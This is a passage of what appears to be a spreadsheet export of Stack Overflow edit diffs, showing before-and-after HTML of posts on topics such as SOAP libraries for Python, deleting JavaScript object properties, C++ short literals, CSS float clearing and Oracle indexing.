  &lt;li&gt;&lt;p&gt;&lt;a href="https://github.com/arskom/spyne" rel="nofollow noreferrer"&gt;spyne&lt;/a&gt;: Creating servers is easy, creating clients a little bit more challenging. Documentation is somewhat lacking.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="http://pypi.python.org/pypi/ladon" rel="nofollow noreferrer"&gt;ladon&lt;/a&gt;: Creating servers is much like in soaplib (using a decorator). Ladon exposes more interfaces than SOAP at the same time without extra user code needed.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="http://code.google.com/p/pysimplesoap/" rel="nofollow noreferrer"&gt;pysimplesoap&lt;/a&gt;: very lightweight but useful for both client and server - includes a web2py server integration that ships with web2py.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://github.com/kiorky/SOAPpy" rel="nofollow noreferrer"&gt;SOAPpy&lt;/a&gt;: Distinct from the abandoned SOAPpy that's hosted at the ZSI link above, this version was actually maintained until 2011, now it seems to be abandoned too.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="http://www.python.org/pypi/soaplib" rel="nofollow noreferrer"&gt;soaplib&lt;/a&gt;: Easy to use python library for writing and calling soap web services. Webservices written with soaplib are simple, lightweight, work well with other SOAP implementations, and can be deployed as WSGI applications.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://bitbucket.org/sboz/osa" rel="nofollow noreferrer"&gt;osa&lt;/a&gt;: A fast/slim easy to use SOAP python client library.&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Of the above, I've only used SUDS personally, and I liked it a lot.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Additionally to what is mentioned above, I will refer to &lt;a href="https://wiki.python.org/moin/WebServices" rel="nofollow noreferrer"&gt;Python WebServices&lt;/a&gt; page which is always up-to-date with all actively maintained and recommended modules to &lt;strong&gt;SOAP&lt;/strong&gt; and all other webservice types.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;Update (2016):&lt;/span&gt;&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; If you only need SOAP client, there is well maintained library called &lt;/span&gt;&lt;a href="http://docs.python-zeep.org/en/latest/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;zeep&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt;. It supports both Python 2 and 3 :)&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>chhantyal</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there any tool that enables you to "hot swap" JavaScript contents while executing a webpage?&lt;/p&gt; _x000D_
 &lt;p&gt; I am looking for something similar to what HotSport does for Java, a way to "hot deploy" new JS code without having to reload the whole page.&lt;/p&gt; _x000D_
 &lt;p&gt; Is there anything like that out there?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there any tool that enables you to "hot swap" JavaScript contents while executing a webpage?&lt;/p&gt; _x000D_
 &lt;p&gt; I am looking for something similar to what HotSport does for Java, a way to "hot deploy" new JS code without having to reload the whole page.&lt;/p&gt; _x000D_
 &lt;p&gt; Is there anything like that out there?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;Clarifying in case people don't understand "hot swap", as indicated by &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;lock&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt;:&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; By "hot swap" I mean allowing me to change pars of the code contained on the .js files included on a given page, reloading the code dynamically.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; That kind of approach simplifies debugging and error fixing, since you don't need to reload the page and start the interaction all over again, from scratch.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>kolrie</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What are the downsides to using &lt;code&gt;&lt;span class="diff-delete"&gt;shared&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; (&lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;static&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; in C#) functions&lt;/span&gt; in a web site business layer &lt;span class="diff-delete"&gt;versus&lt;/span&gt; instantiating a class and then calling a method on the class? What are the performance hits either way?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What are the downsides to using &lt;span class="diff-add"&gt;static methods&lt;/span&gt; in a web site business layer &lt;span class="diff-add"&gt;verses&lt;/span&gt; instantiating a class and then calling a method on the class? What are the performance hits either way?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jason Bunting</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;In Java 7 you&lt;/span&gt; can use&lt;span class="diff-delete"&gt; ...&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;System.getProperty("line.separator");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; to get the line separator&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;You&lt;/span&gt; can use&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;System.getProperty("line.separator");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; to get the line separator&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Keppil</t>
  </si>
  <si>
    <t>null</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Say I create an object thusly:&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; myJSONObject = {&lt;span class="hljs-string"&gt;"ircEvent"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"PRIVMSG"&lt;/span&gt;, &lt;span class="hljs-string"&gt;"method"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"newURI"&lt;/span&gt;, &lt;span class="hljs-string"&gt;"regex"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"^http://.*"&lt;/span&gt;};_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; What is the best way to remove the property 'regex' to end up with this new &lt;code&gt;&lt;span class="diff-delete"&gt;myJSONObject&lt;/span&gt;&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; myJSONObject = {&lt;span class="hljs-string"&gt;"ircEvent"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"PRIVMSG"&lt;/span&gt;, &lt;span class="hljs-string"&gt;"method"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"newURI"&lt;/span&gt;};_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Say I create an object thusly:&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; myJSONObject = {&lt;span class="hljs-string"&gt;"ircEvent"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"PRIVMSG"&lt;/span&gt;, &lt;span class="hljs-string"&gt;"method"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"newURI"&lt;/span&gt;, &lt;span class="hljs-string"&gt;"regex"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"^http://.*"&lt;/span&gt;};_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; What is the best way to remove the property 'regex' to end up with this new &lt;span class="diff-add"&gt;myJSONObject&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; myJSONObject = {&lt;span class="hljs-string"&gt;"ircEvent"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"PRIVMSG"&lt;/span&gt;, &lt;span class="hljs-string"&gt;"method"&lt;/span&gt;: &lt;span class="hljs-string"&gt;"newURI"&lt;/span&gt;};_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>johnstok</t>
  </si>
  <si>
    <t>Amit Joki</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Like this:&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;delete&lt;/span&gt; myObject.&lt;span class="diff-delete"&gt;keyname;&lt;/span&gt;_x000D_
&lt;span class="hljs-comment"&gt;// or,&lt;/span&gt;_x000D_
&lt;span class="hljs-keyword"&gt;delete&lt;/span&gt; &lt;span class="diff-delete"&gt;myObject[&lt;span class="hljs-string"&gt;"keyname"&lt;/span&gt;];&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; For anyone interested in reading more about it, Stack Overflow user &lt;a href="http://stackoverflow.com/users/130652/kangax"&gt;kangax&lt;/a&gt; has written an incredibly in-depth blog post about the &lt;code&gt;delete&lt;/code&gt; statement on their blog, &lt;em&gt;&lt;a href="http://perfectionkills.com/understanding-delete/" rel="nofollow noreferrer"&gt;Understanding delete&lt;/a&gt;&lt;/em&gt;. It is highly recommended.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Like this:&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;delete&lt;/span&gt; myObject.&lt;span class="diff-add"&gt;regex;&lt;/span&gt;_x000D_
&lt;span class="hljs-comment"&gt;// or,&lt;/span&gt;_x000D_
&lt;span class="hljs-keyword"&gt;delete&lt;/span&gt; &lt;span class="diff-add"&gt;myObject[&lt;span class="hljs-string"&gt;'regex'&lt;/span&gt;];_x000D_
&lt;span class="hljs-comment"&gt;// or,&lt;/span&gt;_x000D_
&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; prop = &lt;span class="hljs-string"&gt;"regex"&lt;/span&gt;;_x000D_
&lt;span class="hljs-keyword"&gt;delete&lt;/span&gt; myObject[prop];&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; For anyone interested in reading more about it, Stack Overflow user &lt;a href="http://stackoverflow.com/users/130652/kangax"&gt;kangax&lt;/a&gt; has written an incredibly in-depth blog post about the &lt;code&gt;delete&lt;/code&gt; statement on their blog, &lt;em&gt;&lt;a href="http://perfectionkills.com/understanding-delete/" rel="nofollow noreferrer"&gt;Understanding delete&lt;/a&gt;&lt;/em&gt;. It is highly recommended.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>T.Todua</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Very basic question&lt;span class="diff-delete"&gt;: How&lt;/span&gt; do I &lt;span class="diff-delete"&gt;specify&lt;/span&gt; a &lt;code&gt;short&lt;/code&gt; literal in C++?&lt;/p&gt; _x000D_
 &lt;p&gt; I know the following:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;code&gt;2&lt;/code&gt; is an &lt;code&gt;int&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;2U&lt;/code&gt; is an &lt;code&gt;unsigned int&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;2L&lt;/code&gt; is a &lt;code&gt;long&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;2LL&lt;/code&gt; is a &lt;code&gt;long long&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;2.0f&lt;/code&gt; is a &lt;code&gt;float&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;2.0&lt;/code&gt; is a &lt;code&gt;double&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;'\2'&lt;/code&gt; is a &lt;code&gt;char&lt;/code&gt;.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; But how would I &lt;span class="diff-delete"&gt;specify&lt;/span&gt; a &lt;code&gt;short&lt;/code&gt; literal? I tried &lt;code&gt;2S&lt;/code&gt; but that gives a compiler warning.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Very basic question&lt;span class="diff-add"&gt;.. how&lt;/span&gt; do I &lt;span class="diff-add"&gt;write&lt;/span&gt; a &lt;code&gt;short&lt;/code&gt; literal in C++?&lt;/p&gt; _x000D_
 &lt;p&gt; I know the following:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;code&gt;2&lt;/code&gt; is an &lt;code&gt;int&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;2U&lt;/code&gt; is an &lt;code&gt;unsigned int&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;2L&lt;/code&gt; is a &lt;code&gt;long&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;2LL&lt;/code&gt; is a &lt;code&gt;long long&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;2.0f&lt;/code&gt; is a &lt;code&gt;float&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;2.0&lt;/code&gt; is a &lt;code&gt;double&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;'\2'&lt;/code&gt; is a &lt;code&gt;char&lt;/code&gt;.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; But how would I &lt;span class="diff-add"&gt;write&lt;/span&gt; a &lt;code&gt;short&lt;/code&gt; literal? I tried &lt;code&gt;2S&lt;/code&gt; but that gives a compiler warning.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>DavidRR</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We have a WPF XBAP application that we want to change the configuration on the server after it is deployed. Since the config file is embedded in the deployment files, how is this possible?&lt;/p&gt; _x000D_
 &lt;p&gt; For example, we want to change the database connection strings the deployed app is connected to or we want to update the WCF service binding settings that it is connecting to? We want to update the config file on the server and not have to recompile and redeploy each time.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We have a WPF XBAP application that we want to change the configuration on the server after it is deployed. Since the config file is embedded in the deployment files, how is this possible?&lt;/p&gt; _x000D_
 &lt;p&gt; For example, we want to change the database connection strings the deployed app is connected to or we want to update the WCF service binding settings that it is connecting to? We want to update the config file on the server and not have to recompile and redeploy each time.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Thanks!&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You either do what you've already got, pass in a delimited &lt;em&gt;&lt;span class="diff-delete"&gt;string&lt;/span&gt;&lt;/em&gt; and then parse out to a table value, or the other choice is passing in a wodge of &lt;code&gt;&lt;span class="diff-delete"&gt;XML&lt;/span&gt;&lt;/code&gt; and &lt;span class="diff-delete"&gt;kind&lt;/span&gt; much the same:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://weblogs.asp.net/jgalloway/archive/2007/02/16/passing-lists-to-sql-server-2005-with-xml-parameters.aspx" rel="nofollow noreferrer"&gt;http://weblogs.asp.net/jgalloway/archive/2007/02/16/passing-lists-to-sql-server-2005-with-xml-parameters.aspx&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I haven't had a chance to look &lt;span class="diff-delete"&gt;at &lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;SQL 2008&lt;/span&gt;&lt;/em&gt; yet to see if they've added any new functionality to handle this type of thing.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You either do what you've already got, pass in a delimited &lt;span class="diff-add"&gt;string&lt;/span&gt; and then parse out to a table value, or the other choice is passing in a wodge of &lt;span class="diff-add"&gt;XML&lt;/span&gt; and &lt;span class="diff-add"&gt;kinda&lt;/span&gt; much the same:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://weblogs.asp.net/jgalloway/archive/2007/02/16/passing-lists-to-sql-server-2005-with-xml-parameters.aspx" rel="nofollow noreferrer"&gt;http://weblogs.asp.net/jgalloway/archive/2007/02/16/passing-lists-to-sql-server-2005-with-xml-parameters.aspx&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I haven't had a chance to look &lt;span class="diff-add"&gt;ate SQL 2008&lt;/span&gt; yet to see if they've added any new functionality to handle this type of thing.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>user3164777</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have an instance of a general purpose class that will be executed both under ASP.NET and a stand alone program. This code is sensative to the process where it is being run - that is, there are certin methods that should not called if running under ASP.NET. How do you determine if the code is executing in an ASP.NET process?&lt;/p&gt; _x000D_
 &lt;p&gt; The solution I am currently using is answered below.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &amp;nbsp;&lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have an instance of a general purpose class that will be executed both under ASP.NET and a stand alone program. This code is sensative to the process where it is being run - that is, there are certin methods that should not called if running under ASP.NET. How do you determine if the code is executing in an ASP.NET process?&lt;/p&gt; _x000D_
 &lt;p&gt; The solution I am currently using is answered below.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt;&amp;nbsp; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; For C#, I have often used &lt;a href="http://www.codesmithtools.com/" rel="nofollow noreferrer"&gt;CodeSmith&lt;/a&gt; and lately the &lt;a href="http://www.hanselman.com/blog/" rel="nofollow noreferrer"&gt;T4 generator&lt;/a&gt; which is part of Visual Studio.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm looking for something similar for Java, in particular an Eclipse add-in since I do all my Java development using the Eclipse IDE.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; asdasd&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; For C#, I have often used &lt;a href="http://www.codesmithtools.com/" rel="nofollow noreferrer"&gt;CodeSmith&lt;/a&gt; and lately the &lt;a href="http://www.hanselman.com/blog/" rel="nofollow noreferrer"&gt;T4 generator&lt;/a&gt; which is part of Visual Studio.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm looking for something similar for Java, in particular an Eclipse add-in since I do all my Java development using the Eclipse IDE.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Johannes Kuhn</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; NP stands for Non-deterministic Polynomial time.&lt;/p&gt; _x000D_
 &lt;p&gt; This means that the problem can be solved in Polynomial time using a &lt;a href="http://en.wikipedia.org/wiki/Turing_machine" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Turing Machine&lt;/span&gt;&lt;/a&gt;. Basically, a solution has to be &lt;i&gt;testable&lt;/i&gt; in poly time. If that's the case, and a known NP problem can be solved using the given problem with modified input (an NP problem can be &lt;i&gt;reduced&lt;/i&gt; to the given problem) then the problem is NP complete.&lt;/p&gt; _x000D_
 &lt;p&gt; The main thing to take away from an NP-complete problem is that it cannot be solved in polynomial time in any known way. NP-Hard/NP-Complete is a way of showing that certain classes of problems are not solvable in realistic time.&lt;/p&gt; _x000D_
 &lt;p&gt; Edit: As others have noted, there are often approximation solutions for NP-Complete problems. In this case, the approximation solution usually gives a approximation bound using special notation which tells us how close the approximation is.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; NP stands for Non-deterministic Polynomial time.&lt;/p&gt; _x000D_
 &lt;p&gt; This means that the problem can be solved in Polynomial time using a&lt;span class="diff-add"&gt; Non-deterministic Turing machine&lt;/span&gt; &lt;span class="diff-add"&gt;(like a regular Turing machine but also including a non-deterministic "choice" function)&lt;/span&gt;. Basically, a solution has to be &lt;i&gt;testable&lt;/i&gt; in poly time. If that's the case, and a known NP problem can be solved using the given problem with modified input (an NP problem can be &lt;i&gt;reduced&lt;/i&gt; to the given problem) then the problem is NP complete.&lt;/p&gt; _x000D_
 &lt;p&gt; The main thing to take away from an NP-complete problem is that it cannot be solved in polynomial time in any known way. NP-Hard/NP-Complete is a way of showing that certain classes of problems are not solvable in realistic time.&lt;/p&gt; _x000D_
 &lt;p&gt; Edit: As others have noted, there are often approximation solutions for NP-Complete problems. In this case, the approximation solution usually gives a approximation bound using special notation which tells us how close the approximation is.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Aryabhatta</t>
  </si>
  <si>
    <t>Yuval Adam</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have the age-old problem of a &lt;code&gt;div&lt;/code&gt; wrapping a two-column layout. My sidebar is floated, so my container &lt;code&gt;div&lt;/code&gt; fails to wrap the content and sidebar.&lt;span class="diff-delete"&gt;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lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre class="lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;div id="container"&amp;gt;_x000D_
  &amp;lt;div id="content"&amp;gt;&amp;lt;/div&amp;gt;_x000D_
  &amp;lt;div id="sidebar"&amp;gt;&amp;lt;/div&amp;gt;_x000D_
&amp;lt;/div&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; There seem to be numerous methods of fixing the clear bug in Firefox:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&amp;lt;br clear="all"/&amp;gt;&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;overflow:auto&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;overflow:hidden&lt;/code&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; In my situation, the only one that seems to work correctly is the &lt;code&gt;&amp;lt;br clear="all"/&amp;gt;&lt;/code&gt; solution, which is a little bit scruffy. &lt;code&gt;overflow:auto&lt;/code&gt; gives me nasty scrollbars, and &lt;code&gt;overflow:hidden&lt;/code&gt; must surely have side effects. Also, IE7 apparently shouldn't suffer from this problem due to its incorrect behaviour, but in my situation it's suffering the same as Firefox.&lt;/p&gt; _x000D_
 &lt;p&gt; Which method currently available to us is the most robust?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have the age-old problem of a &lt;code&gt;div&lt;/code&gt; wrapping a two-column layout. My sidebar is floated, so my container &lt;code&gt;div&lt;/code&gt; fails to wrap the content and sidebar.&lt;/p&gt; _x000D_
 &lt;pre class="lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;div id="container"&amp;gt;_x000D_
  &amp;lt;div id="content"&amp;gt;&amp;lt;/div&amp;gt;_x000D_
  &amp;lt;div id="sidebar"&amp;gt;&amp;lt;/div&amp;gt;_x000D_
&amp;lt;/div&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; There seem to be numerous methods of fixing the clear bug in Firefox:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&amp;lt;br clear="all"/&amp;gt;&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;overflow:auto&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;overflow:hidden&lt;/code&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; In my situation, the only one that seems to work correctly is the &lt;code&gt;&amp;lt;br clear="all"/&amp;gt;&lt;/code&gt; solution, which is a little bit scruffy. &lt;code&gt;overflow:auto&lt;/code&gt; gives me nasty scrollbars, and &lt;code&gt;overflow:hidden&lt;/code&gt; must surely have side effects. Also, IE7 apparently shouldn't suffer from this problem due to its incorrect behaviour, but in my situation it's suffering the same as Firefox.&lt;/p&gt; _x000D_
 &lt;p&gt; Which method currently available to us is the most robust?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>NathanOliver</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I would like to know if there are general rules for creating an index or not. How do &lt;span class="diff-delete"&gt;i&lt;/span&gt; choose which fields &lt;span class="diff-delete"&gt;i&lt;/span&gt; should include in this index or when not to include them?&lt;/p&gt; _x000D_
 &lt;p&gt; I know its always depends on the environement and the amount of data, but &lt;span class="diff-delete"&gt;i&lt;/span&gt; was wondering if we could make some globally accepted rules about making indexes in Oracle&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I would like to know if there are general rules for creating an index or not. How do &lt;span class="diff-add"&gt;I&lt;/span&gt; choose which fields &lt;span class="diff-add"&gt;I&lt;/span&gt; should include in this index or when not to include them?&lt;/p&gt; _x000D_
 &lt;p&gt; I know its always depends on the environement and the amount of data, but &lt;span class="diff-add"&gt;I&lt;/span&gt; was wondering if we could make some globally accepted rules about making indexes in Oracle&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>guigui42</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;class Foo; def method1; puts 1; end; end_x000D_
foo = Foo.new_x000D_
&lt;span class="diff-delete"&gt;other_foo =&lt;/span&gt; &lt;span class="diff-delete"&gt;Foo.new&lt;/span&gt;_x000D_
def foo.method2; puts 2; end_x000D_
_x000D_
foo.method1&lt;span class="diff-delete"&gt; #&amp;gt;&amp;gt; &lt;/span&gt;1_x000D_
foo.method2&lt;span class="diff-delete"&gt; #&amp;gt;&amp;gt; &lt;/span&gt;2_x000D_
other_foo.&lt;span class="diff-delete"&gt;method1&lt;/span&gt; &lt;span class="diff-delete"&gt;#&amp;gt;&amp;gt;&lt;/span&gt; 1_x000D_
other_foo.method2&lt;span class="diff-delete"&gt; #&amp;gt;&amp;gt; &lt;/span&gt;NoMethodError: undefined method `method2' for #&amp;lt;Foo:0xb79f0ef4&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
